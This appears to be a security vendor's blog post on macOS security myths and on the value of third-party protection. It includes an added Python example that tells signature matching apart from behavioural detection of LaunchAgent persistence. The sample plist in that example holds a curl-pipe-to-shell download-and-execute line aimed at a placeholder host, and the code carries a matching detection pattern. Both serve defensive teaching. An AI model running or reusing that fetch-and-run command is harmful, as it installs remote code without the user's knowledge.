Hi, I’m a Mac guy! Over the past year, I've received many questions from people—sales people, technical people, directors and executives, end users like my family, and beyond—that all revolve around "why should we protect macOS?" Now, this question is usually in the subtext.
There are a handful of macOS security myths out there, which brings a lot of questions from users or the IT community. So, let's address some of the most common questions I've received, and then wrap up by discussing the big one: "Why should I protect my Mac?"
"More vulnerable" might not be the most accurate description. Windows devices are currently targeted more, which can make them seem more vulnerable. macOS is still vulnerable to attacks, but because Macs still hold a smaller share of the market, it makes sense that there is a perception that macOS is less vulnerable.
That being said, macOS has put many different security mechanisms into its operating system in order to safeguard the end user. Whether it's transparency into what applications are installing persistence, its Transparency, Consent, and Control (TCC) functionality, or its built-in malware protection, Apple has taken many steps to try to protect its end users.
I think there are a handful of reasons for this misconception. One possibly being that macOS security isn't as, pardon the expression, "sexy" as it is on Windows. Although threat actors have attempted to target macOS, those efforts have not played out at scale so far, and macOS has seen only a limited number of very sophisticated attacks.
On top of this, Windows is still the dominating force in the enterprise business space. Even with macOS growing in popularity, it still pales in comparison. So it makes sense that threat actors would be more likely to target Windows devices with their malware, as opposed to writing a macOS version of it. Although we've seen some cross-platform malware before, typically in the form of a script, you're unlikely to see the same volume of malware on macOS as you would on Windows.
The short answer: yes. As mentioned above, a huge segment of macOS malware is more adware-y than sophisticated attacks. That isn't to say that more targeted, specific, highly sophisticated attacks don't exist. We've seen with the XCSSET malware that threat actors can target programs in the macOS ecosystem, as well as (ab)use the TCC database. We've witnessed malware exploiting 0-days in the operating system to persist, as well as leveraging shells like zsh, as the Shlayer malware does.
The sad truth is that Apple just stuck to their guns and never really addressed this folly. This has made many users unaware that the device they use can get viruses. This can also lead to users getting more malware, due to the fact that they are more likely to blindly trust popups on their device because they believe their device is impervious to malware.
Think of it this way: your home is secure by locking your doors. Maybe you have a deadbolt that you swing shut at night. That's Apple and its security. Yes, it's a first line of defense. And for some users, that's enough. But for me, at my house, I also have additional layers—like security cameras and a doorbell camera. I leverage these third-party tools to get more insight into who is approaching my house before they even cross the threshold of my porch.
That's what a third-party security tool does—offers more insight, tighter security, and can alert you earlier to allow you to take swift action if necessary.
To quote a previous blog post of my own where I spoke about Apple's XProtect/XProtect Remediator:
The lack of consumable visibility into what is happening with XProtect and XPR makes it difficult to triage issues at scale. To add to this, Apple has millions of endpoints and any changes to these rules get pushed to all of those machines. That being said, they have zero wiggle room for false positives, which although it is what every EDR company aims to reduce, the truth is that casting a slightly larger net in order to capture malicious behavior, and risking the occasional false positive in lieu of this (to me) is a great tradeoff. Lastly, although YARA is helpful for capturing more samples of malware families, it doesn’t necessarily capture malicious behavior. The malware has to be from specific families in order to be prevented.
To sum it up, Apple has to be incredibly careful with what they push to their endpoints. As well as Apple can protect your device, there are still many holes, which is why a third-party solution is ideal. If this is something you’re considering for your macOS machines, consider a trial with Huntress.
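To make the signature-versus-behavior distinction from the quoted passage concrete, here is an added example (not code from this post, from Huntress, or from Apple's XProtect) that triages a LaunchAgent persistence plist two ways: a family-specific label match, and family-agnostic heuristics over what the agent would actually run. The family label, the directories, and the sample plist are all constructed for illustration.

```python
"""Signature vs. behavioural triage of a macOS LaunchAgent plist.
Added example; the family label and sample plist are constructed,
not real XProtect rules or real malware artifacts."""
import plistlib
import re

# Constructed indicator for one hypothetical family. A signature like
# this only fires on that family, which is the gap the post describes.
FAMILY_LABELS = {"com.example.badfamily.agent"}

INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "perl"}
WRITABLE_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")


def signature_match(plist):
    """Family-specific match: catches known samples and nothing else."""
    return plist.get("Label") in FAMILY_LABELS


def behavioral_flags(plist):
    """Family-agnostic heuristics on the persisted command line."""
    args = plist.get("ProgramArguments") or []
    cmd = " ".join(args)
    prog = args[0].rsplit("/", 1)[-1] if args else ""
    flags = []
    if prog in INTERPRETERS and any(d in cmd for d in WRITABLE_DIRS):
        flags.append("interpreter runs script from world-writable path")
    if re.search(r"curl\b.*\|\s*(ba|z)?sh\b", cmd):
        flags.append("download-and-execute pipeline")
    label = plist.get("Label", "")
    if label.startswith("com.apple.") and not cmd.startswith(("/System/", "/usr/")):
        flags.append("Apple-looking label for non-Apple program")
    return flags


def triage(plist_xml):
    """Parse one LaunchAgent plist (bytes) and return both verdicts."""
    p = plistlib.loads(plist_xml)
    return {"label": p.get("Label"), "signature": signature_match(p),
            "behavior": behavioral_flags(p)}


# Constructed sample: not the known family, but it behaves like a dropper.
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.apple.updater.helper</string>
<key>RunAtLoad</key><true/>
<key>ProgramArguments</key><array><string>/bin/zsh</string><string>-c</string>
<string>curl -s http://placeholder.invalid/x | sh</string></array>
</dict></plist>"""
```

Running `triage(SAMPLE)` shows the signature miss (`False`) alongside two behavioral flags; the opposite case, a known-family label with an innocuous command, is caught only by the signature.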
I feel like every question here builds up to this one: Why?
Although macOS is a smaller percentage of devices in the SMB market and in the large markets, it's still quite the viable target. If you think about it, if users are wondering why they should protect their Mac and considering not using an AV solution, then threat actors will have an easy time infecting devices.
Don’t be stuck with just a deadbolt to protect your Mac. Invest in a third-party security tool to lock down the whole house.